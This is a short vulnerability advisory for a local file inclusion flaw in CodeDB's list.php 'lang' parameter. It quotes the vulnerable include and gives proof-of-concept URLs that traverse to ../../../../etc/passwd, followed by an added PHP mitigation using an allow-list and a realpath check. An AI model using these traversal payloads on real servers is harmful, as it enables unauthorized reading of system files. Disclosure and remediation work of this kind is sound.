CodeDB (list.php lang) Local File Inclusion Vulnerability
2023-05-24
###############################################################################
#
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Author : cOndemned
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################
Source :
// list.php
$lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol
// ...
if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension
    include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d
Proof of Concept :
http://[host]/[codeDB_path]/list.php?lang=../readme.txt
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
http://[host]/[codeDB_path]/list.php?lang=../[local_file]
EoF.
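Mitigation sketch for the include shown above (an added example, not part of the original advisory and not CodeDB's own code). htmlspecialchars() only encodes HTML metacharacters, so `../` passes through unchanged; the fix is to allow-list the value and confirm the resolved path stays inside templates/. The language codes, the default language and the function name resolve_template() are assumptions.

```php
<?php
// Added example: hardened template lookup for a list.php-style include.
// ALLOWED_LANGS, DEFAULT_LANG and resolve_template() are hypothetical names.

const TEMPLATE_DIR  = __DIR__ . '/templates';
const ALLOWED_LANGS = ['en', 'pl', 'de'];   // assumed set of shipped languages
const DEFAULT_LANG  = 'en';

/**
 * Return the absolute path of the "<lang>_middle.php" template,
 * or null when it does not exist inside TEMPLATE_DIR.
 */
function resolve_template(?string $lang): ?string
{
    // 1. Allow-list: anything that is not an exact known code falls back
    //    to the default, so "../", NUL bytes and slashes never reach the path.
    if ($lang === null || !in_array($lang, ALLOWED_LANGS, true)) {
        $lang = DEFAULT_LANG;
    }

    // 2. Defence in depth: canonicalise and require the result to sit
    //    under the template directory (also catches symlinks pointing out).
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $lang . '_middle.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// $_GET values can be arrays (?lang[]=x); accept strings only.
$raw      = $_GET['lang'] ?? null;
$template = resolve_template(is_string($raw) ? $raw : null);

if ($template === null) {
    http_response_code(404);
    exit('Template not found');
}
include $template;
```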
